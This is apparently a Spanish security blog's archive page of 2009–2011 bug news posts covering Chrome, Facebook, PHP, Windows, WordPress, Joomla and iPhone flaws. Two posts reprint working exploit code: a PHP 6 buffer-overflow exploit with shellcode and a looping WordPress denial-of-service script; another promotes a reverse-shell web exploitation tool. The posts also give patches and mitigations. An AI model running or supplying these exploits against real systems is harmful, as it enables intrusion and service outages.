La Comunidad DragonJAR » Bug

0day en Google Chrome

DragoN — Fri, 06 May 2011 06:10:55 +0000

Después de ser anunciado por 3 años consecutivos como el navegador mas seguro en el famoso Pwn2Own, Google Chrome ha caído, los responsables de esta hazaña han sido investigadores de la empresa VUPEN Security, quienes lograron saltar todas las medidas de seguridad implementadas por el navegador.

Por mucho tiempo Google Chrome se escondió bajo su caja de arena y las protecciones que le ofrecía el sistema operativo de turno, ASLR, DEP, pero ingenieros de la empresa VUPEN Security, encontraron el eslabón débil en la cadena de chrome, que durante varios años buscaron otros, logrando esquivar todas las protecciones implementadas en el navegador y ejecutar código arbitrario en el sistema de forma totalmente transparente para el usuario.

Destaca la limpia ejecución de código en el sistema, con solo visitar un sitio web y sin que el navegador se bloqueara, también el hecho que el fallo pueda ser recreado en sistemas de 32 y 64 Bits sin problemas.

Mas Información:
Anuncio Oficial en la pagina de VUPEN

También puede interesarte...

Memorias del Black Hat USA 2010

DragoN — Thu, 29 Jul 2010 05:59:29 +0000

Se ha liberado la documentación oficial del Blackhat USA, una de las conferencia de seguridad más importantes a nivel mundial, a continuación les dejo los contenidos expuestos en estas conferencias.

Posiblemente encuentren los servidores saturados por la gran demanda que deben tener estos documentos en estos momentos.

Mas Información:
Blackhat USA 2010 Media Archives

También puede interesarte...

como entrar al facebook de otra persona

Axiacamus — Wed, 05 May 2010 19:27:47 +0000

como entrar al facebook de otra persona, es una pregunta que muchos usuarios de Facebook se hacen, ya sea por que quieren entrar al facebook de otra persona (novia, novio, jefe, etc..) por motivos personales, o por simple curiosidad; Hoy al entrar en Facebook me encontré con la sorpresa que el Chat no funcionaba, al pasar el mouse por encima decía que estaba en mantenimiento, después de un par de horas vi que seguía sin funcionar, me di a la tarea de investigar que pasaba y me pregunté alguna persona habrá hackeado Facebook…

Aquella pregunta que siempre hacen las personas, sobre si es posible entrar al facebook de otra persona o ”hackear una cuenta de Facebook” fue respondida esta mañana, la pregunta la realizan algunas personas por curiosidad o por querer saber cosas como por ejemplo si su pareja le está siendo infiel, por lo cual es muy frecuente que hagan búsquedas en Google del tipo ¿cómo saber la contraseña de Facebook? o ¿como entrar al facebook de otra persona? , pero lo más sorprendente durante mi búsqueda para saber qué era lo que pasaba, fue enterarme que un fallo en Facebook permitía con unos sencillos pasos y tan solo unos clics (nada de programación, ni compilar códigos ni nada) podíamos estar frente a la cuenta de cualquiera de nuestros contactos, resolviendo la pregunta de muchos, como entrar al facebook de otra persona.

como entrar al facebook de otra persona

El fallo o bug en Facebook se encontraba en la configuración de privacidad, donde podíamos ver la manera en que otros usuarios ven nuestro perfil, lo que sucedía era que realmente cargaba el perfil de ese usuario y nos permitía ver sus conversaciones, historiales, solicitudes y algunos detalles de la cuenta que dejaban ver información sensibler resolviendo todo… como entrar al facebook de otra persona.

Cabe destacar que hoy mismo fue solucionado este fallo por lo que no podras entrar al facebook de otra persona y ya está de nuevo el chat en funcionamiento, sin embargo me quedan dudas acerca de la seguridad de esta famosa red social, ya que era un fallo bastante grave y realmente es un descuido serio en la programación de la misma.

como entrar al facebook de otra persona

¿como entrar al facebook de otra persona? ya sabes, y de nuevo te dejo estas recomendación para que configures adecuadamente tus niveles de privacidad, en las diferentes redes sociales, no agregues personas que no conoces a tu cuenta y mantente al tanto de las noticias sobre fallos de seguridad en las redes sociales que utilizas, de esta forma las personas no se preguntaran como entrar al facebook de otra persona, para ingresar a tu cuenta.

Más Información para saber como entrar al facebook de otra persona:
Major Facebook security hole lets you view your friends’ live chats
como entrar al facebook de otra persona

También puede interesarte...

Buffer Overflow en PHP 6 Dev

DragoN — Mon, 03 May 2010 07:48:30 +0000

Recientemente fue descubierto un fallo grave de seguridad en la versión de desarrollo de PHP 6, el lenguaje de programación mas utilizado para realizar aplicaciones web.

El problema se encuentra en la funcion str_transliterate() que permite “traducir” un texto de un lenguaje a otro, pero a su vez no valida adecuadamente los parámetros de entrada y permite la ejecución de código por medio de un buffer overflow.

Les dejo una PoC que explota esta vulnerabilidad sobre servidor Apache, corriendo en Windows XP SP3 y permite ejecutar la calculadora del sistema:

# Title: PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit # EDB-ID: 12051 # CVE-ID: () # OSVDB-ID: () # Author: Pr0T3cT10n # Published: 2010-04-04 # Verified: yes # Download Exploit Code # Download Vulnerable app
error_reporting(0); ##################################################################### ## PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit ## Tested on WIN XP HEB SP3, Apache, PHP 6.0 Dev ## Buffer Overflow ## Bug discovered by Pr0T3cT10n, ## Exploited by TheLeader, Debug ## SP. Thanks: HDM ## http://www.nullbyte.org.il ##################################################################### ## This code should exploits a buffer overflow in the str_transliterate() function to call WinExec and execute CALC ## Take a look, 'unicode.semantics' has to be on! ## php.ini > unicode.semantics = on ##################################################################### if(ini_get_bool('unicode.semantics')) { $buff = str_repeat("\u4141", 256); $eip = "\u1445\u10A9"; # 0x10A91445 JMP ESP @ php6ts.dll $nops = str_repeat("\u9090", 20);
# WinExec Calc XP SP3 HEB Unicode-encoded shellcode $shellcode = "\u02EB\u05EB\uF9E8\uFFFF\u33FF\u5BC0\u4388\u8315\u11C3\uBB53\u250D\u7C86\uD3FF\u6163\u636C\u414E";
# WinExec Calc XP SP3 EN Unicode-encoded shellcode (added by muts) # $shellcode = "\u02EB\u05EB\uF9E8\uFFFF\u33FF\u5BC0\u4388\u8315\u11C3\uBB53\u23AD\u7C86\uD3FF\u6163\u636C\u414E";
$exploit = $buff.$eip.$nops.$shellcode; str_transliterate(0, $exploit, 0); } else { exit("Error! 'unicode.semantics' has be on!\r\n"); }
function ini_get_bool($a) { $b = ini_get($a); switch (strtolower($b)) { case 'on': case 'yes': case 'true': return 'assert.active' !== $a; case 'stdout': case 'stderr': return 'display_errors' === $a; default: return (bool) (int) $b; } } ?>

Hay que recordar que esta versión de PHP aun esta en desarrollo, pero no deja de ser inquietante este tipo de problemas de carácter critico, en un lenguaje de programación tan extendido en la red, como lo es PHP.

Mas Información:
PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
Codigo en exploit-db.com

También puede interesarte...

WebRaider – Explotación automatizada de aplicaciones Web

DragoN — Thu, 08 Apr 2010 17:10:03 +0000

WebRaider es una herramienta para buscar y explotar vulnerabilidades de forma automatizada en aplicaciones web, que se centra en la explotación de las aplicaciones web.

La idea es simple, obtener una shell inversa o de una inyección de SQL y una petición sin necesidad de utilizar un canal extra como TFTP, FTP para subir la carga inicial.

Las características de esta herramienta son las siguientes:

Realiza solo una solicitud, por lo tanto es mas rápido
No es necesario ninguna herramienta, se puede simplemente utilizar el navegador o un sencillo proxy MITM
Solo tienes que copiar y pegar el payload
Es posible diseñar un ataque CSRF para que nos devuelva una shell inversa
El payload no ocupa mas de 3500 caracteres
No son necesarias aplicaciones del sistema como FTP, TFTP o Debug.exe
Fácil de automatizar

Aquí les dejo la presentación de la herramienta:

De momento WebRaider solo funciona en entornos Microsoft Windows, pero al tener a la mano el código fuente no creo que tarden mucho en hacerlo correr para cualquier GNU Linux o Mac OS X utilizando WINE.

Advertencia: Posiblemente esta herramienta sea detectada por tu antivirus como una “hacktool” o una amenaza para tu equipo, en ningún momento ha sido modificada por la comunidad dragonjar y el archivo es descargado directamente desde los servidores oficiales de WebRaider, tienes el código fuente disponible para que lo revises y crees tu propio ejecutable, en ningún momento la comunidad dragonjar ha introducido software malicioso en esta u otras herramientas publicadas desde nuestro portal.

Descargar WebRaider Herramienta para explotación automatizadas en aplicaciones web

También puede interesarte...

Vulnerabilidad 0-day en todas las versiones de Windows

DragoN — Wed, 20 Jan 2010 20:55:02 +0000

Microsoft no ha empezado el año bien con respecto a la seguridad de sus productos, mientras muchos todavía esperamos los parches oficiales para el 0-Day en el Internet Explorer que se anuncio hace poco, hoy sale a la luz publica otro 0-Day que afecta a todas las versiones del sistema operativo Microsoft Windows.

Este fallo descubierto por el investigador Tavis Ormandy (miembro del equipo de seguridad de google), se aprovecha del soporte heredado de aplicaciones de 16 bits que Windows viene heredando desde su versión “NT” y permite a un atacante obtener privilegios de SYSTEM (máximo privilegio en el sistema) en un sistema vulnerable.

Aunque todavía no existe un parche para este fallo de seguridad, solo tendremos que deshabilitar el soporte para aplicaciones de 16 bits para proteger nuestro sistema, a continuación les dejo una serie de pasos a seguir para desactivarlo:

Inicio/Ejecutar gpedit.msc
Abrir “Configuración de equipo”/ “Plantillas administrativas”/ “Componentes de Windows”/”Compatibilidad de aplicación”
Y habilitar “Impedir el acceso a aplicaciones de 16 bits”

O puedes seguir los pasos de los siguientes vídeos según tu sistema operativo

Windows Server 2003:

Windows Server 2008

Para Windows XP:

Ya existe un exploit publicado para este bug que funciona correctamente incluso en Windows 7, puedes encontrar el código fuente en este enlace, o el exploit compilado aquí, por lo tanto es MAS QUE RECOMENDADO que desactives el soporte para 16 bits de tu sistema y actualices el mismo con Windows Update tan pronto salga el parche que corrija este problema.

Mas Información:
Grave vulnerabilidad en Windows permite elevar privilegios
Vulnerabilidad muy crítica en todas las versiones de Windows

También puede interesarte...

Denegacion de Servicio en WordPress

DragoN — Sun, 18 Oct 2009 21:26:41 +0000

Jose Carlos Norte acaba de publicar en su blog, un nuevo fallo de seguridad descubierto en el popular wordpress, este fallo permite a a cualquier persona de forma sencilla dejar fuera de linea un blog con WordPress causando una denegacion de servicio.

El bug se encuentra en el archivo wp-trackback.php quien no valida adecuadamente la variable $charset, permitiendo ingresar una peticion POST especialmente diseñada con una cantidad indeterminada de parámetros, causando un gran consumo de memoria y CPU hasta que estos se agoten y el servidor deja de responder.

Todas las versiones de WordPress hasta el momento son vulnerables a este fallo (y según Jose Carlos, el parche que publicaría WordPress tampoco lo soluciona), aunque dependiendo de la configuración individual de cada servidor, el problema es mayor o menor, por ejemplo un servido con mod_security, no seria vulnerable ya que bloquearía estas peticiones mal intencionadas, también se pueden mitigar los daños con una adecuada configuración del parámetro php_memory_limit del php.ini para evitar que tus desarrollos web utilicen mas memoria de la que en realidad necesitan, podrías también utilizar el WP-IDS un mod para WordPress del PHPIDS (reseñado el la guía blanca de seguridad en wordpress WordPress Security Whitepaper) el cual bloquearía no solo estas peticiones sino muchos mas problemas de seguridad.

Les dejo la solución propuesta por Jose Carlos en su blog para este problema:

Reemplazar en la linea 45 del archivo wp-trackback.php esto $charset = $_POST['charset'];
por esto
$charset = str_replace(”,”,””,$_POST['charset']);
if(is_array($charset)) { exit; }

Y el exploit para verificar que somos vulnerables:

//wordpress Resource exhaustion Exploit //http://rooibo.wordpress.com/ //security@wordpress.org contacted and get a response, //but no solution available. if(count($argv) < 2) { echo “You need to specify a url to attack\n”; exit; }
$url = $argv[1];
$data = parse_url($url);
if(count($data) < 2) { echo “The url should have http:// in front of it, and should be complete.\n”; exit; } if(count($data) == 2) { $path = ”; } else { $path = $data['path']; } $path = trim($path,’/’); $path .= ‘/wp-trackback.php’; if($path{0} != ‘/’) { $path = ‘/’.$path; } $b = “”; $b = str_pad($b,140000,’ABCEDFG’); $b = utf8_encode($b); $charset = “”; $charset = str_pad($charset,140000,”UTF-8,”); $str = ‘charset=’.urlencode($charset); $str .= ‘&url=www.example.com’; $str .= ‘&title=’.$b; $str .= ‘&blog_name=lol’; $str .= ‘&excerpt=lol’; $count = 0; while(1) { $fp = @fsockopen($data['host'],80); if(!$fp) { if($count > 0) {
echo “down!!!!\n”;
exit;
}
echo “unable to connect to: “.$data['host'].”\n”;
exit;
}
fputs($fp, “POST $path HTTP/1.1\r\n”);
fputs($fp, “Host: “.$data['host'].”\r\n”);
fputs($fp, “Content-type: application/x-www-form-urlencoded\r\n”);
fputs($fp, “Content-length: “.strlen($str).”\r\n”);
fputs($fp, “Connection: close\r\n\r\n”);
fputs($fp, $str.”\r\n\r\n”);
echo “hit!\n”;
$count++;
}
?>

Para mas informacion:
Agujero de seguridad muy grave en WordPress
Atención! BUG WordPress
WordPress Security Whitepaper

$charset = $_POST['charset'];

También puede interesarte...

Bug en el modulo Quick Question de Joomla

DragoN — Sun, 30 Aug 2009 06:23:34 +0000

Gracias a PwnTnT en el foro me entero que el Centro de Estudios Superiores en Alta Tecnología en México realizo una especie de auditoria en el modulo Quick Question de Joomla encontrando mas de 7 fallos de seguridad en el mismo.

Algunas de las vulnerabilidades encontradas en este modulo de joomla son:

Log’s Poisoning
Massive Mail Sending
Visible Log’s
XSS
Email Bombing
LFI
y muchas mas

Podemos ver un vídeo donde se explota algunas de las vulnerabilidades de este modulo de Joomla

La misma gente del Centro de Estudios Superiores en Alta Tecnologia ha publicado un parche temporal para solucionar estos fallos de seguridad, solo es necesario crear .htacces en la carpeta donde se ubica el archivo quickQuestionLog.txt, con el siguiente contenido:

RewriteCond %{REQUEST_URI} ^(quickQuestionLog.txt) [NC] RewriteRule ^.*$ - [F,L]

y colocar el siguiente código al inicio del archivo mod_quick_question_sendform.php:

foreach($_REQUEST as $key => $value) $_REQUEST[$key] = htmlentities($value);

Puedes descargar una prueba de concepto y el full advisory de aqui.

Mas Información:
CCAT Research Lab`s – Advisor No. 2
Post en el foro

También puede interesarte...

Cuidado con los correos en tu iPhone o iPod Touch

DragoN — Sun, 16 Aug 2009 20:11:55 +0000

Si tienes un iPhone o un iPod Touch con firmware 3.0, debes tener cuidado con los correos que “borras” desde el, ya que recientemente el investigador Matt Janssen ha descubierto un fallo en esta versión del iPhone OS que permite “revivir” correos eliminados previamente desde tu dispositivo, incluso si este ha sido eliminado del servidor de correo y el cliente.

Pueden ver el bug funcionando en el siguiente vídeo:

El bug se encuentra en el Spotlight del iPhone o iPod Touch, que no sincroniza adecuadamente el estado de los mensajes con el cliente de e-mail ni con el servidor de correo, guardando un cache de los mensajes y permitiendo “revivir” cualquier correo que hayas recibido desde tu dispositivo.

Esto sumado a otros 12 bugs encontrados en el Firmware 3.0 del iPhone OS nos hace pensar que estamos a puertas de una nueva actualización de este firmware, es recomendable entonces estar pendientes de las actualizaciones del iPhone OS.

También puede interesarte...

Solucionar crashes inesperados de Firefox 3.5

Cortex — Fri, 14 Aug 2009 15:27:43 +0000

He tenido bastantes problemas con Firefox 3.5 en mi Arch. En Gentoo, me funciona perféctamente y nunca he tenido ni un sólo problema con su desempeño, funciona perféctamente; en Arch es complétamente diferente, haciendo cosas normales como revisar el correo electrónico o ver un video en Youtube se cierra sin ningún motivo aparente y sólo en algunas de las ocasiones recupera las pestañas que tenía abiertas.

Intenté compilando Firefox y no hacer uso del pkg.tar.gz que encuentras en los repositorios extra, pero sin ningún resultado.. seguían los mismos fallos. Recordé que Firefox hace uso de Xulrunner (entorno de ejecución) así que me dispuse a recompilarlo y he ahí la solución

Voy a mostrar como realizar el proceso en la distribución Arch Linux haciendo uso de ABS. Lo más probable es que en tu distribución funcione corréctamente ó sino, te toca compilar a mano.

1. Instalar ABS. ABS es el Sistema de Construcción de Arch (Arch Building System) el cual permite construir y empaquetar paquetes partiendo de su código fuente (al estilo de los ports *BSD). Haciendo uso de pacman podemos instalar el paquete que hemos generado.

pacman -S abs

2. Editemos los flags de compilación para ajustarlo a nuestra arquitectura. No pienso profundizar en esto, ya que es un largo tema (man gcc), digamos a modo resumido que haciendo eso podemos optimizar los binarios que generamos y obtener un mejor desempeño (no siempre es así). Es muy importante tener bien las CFLAGS, sino puede que los programas no tenga el funcionamiento esperado, como nos explica Javi. Aquí encuentras CFLAGS para tu arquitectura que está comprobado su buen funcionamiento.

nano /etc/makepkg.conf

3. Actualizamos el árbol ABS. Como root:

abs

4. Creemos un directorio en nuestro home en el cual realizaremos las labores de compilación:

mkdir ~/abs

5. Copiemos los ABS a nuestro directorio:

cp -r /var/abs/extra/firefox ~/abs cp -r /var/abs/extra/xulrunner ~/abs

6. Ahora compilemos xulrunner:

cd ~/abs/xulrunner makepkg

Nota: Eso se te llevará un buen rato, dependiendo de los parametros de compilación que hayas definido anteriormente y del hardware de tu equipo. En mi caso se ha tomado 20 minutos, pero lo he compilado también en otros equipos y se ha tomado hasta 45 minutos.

6. Si todo ha salido bien ya deberíamos de tener un archivo con nombre xulrunner-xxxx-arch-.pkg.tar.gz. Ese es el precompilado que hemos generado que instalaremos posteriormente con pacman. Ahora compilemos Firefox (este si se lleva muy poco tiempo). Para evitar tener que descargar de nuevo el código fuente (unos 45 MB) simplemente lo copiamos al directorio de Firefox:

cp ~/abs/xulrunner/firefox*.tar.bz2 ~/abs/firefox/ cd ~/abs/firefox makepkg

7. Una vez hayamos terminado de compilar, procedemos a instalar. Primero eliminemos las versiones que hemos instalado desde los repositorios:

pacman -Rd firefox xulrunner

Es muy importante que los desinstales usando el flag -d, sino te pondrá problema por dependencias huérfanas. Ahora sí, instalemos:

pacman -U ~/abs/xulrunner/xulrunner*.pkg.tar.gz pacman -U ~/abs/firefox/firefox*.pkg.tar.gz

Y listo Tu Firefox debería de estar funcionando perfectamente (almenos así fué en mi caso).

Las ventajas de trabajar con el código fuente. ¿Les quedó gustando? Pregunten por Gentoo entonces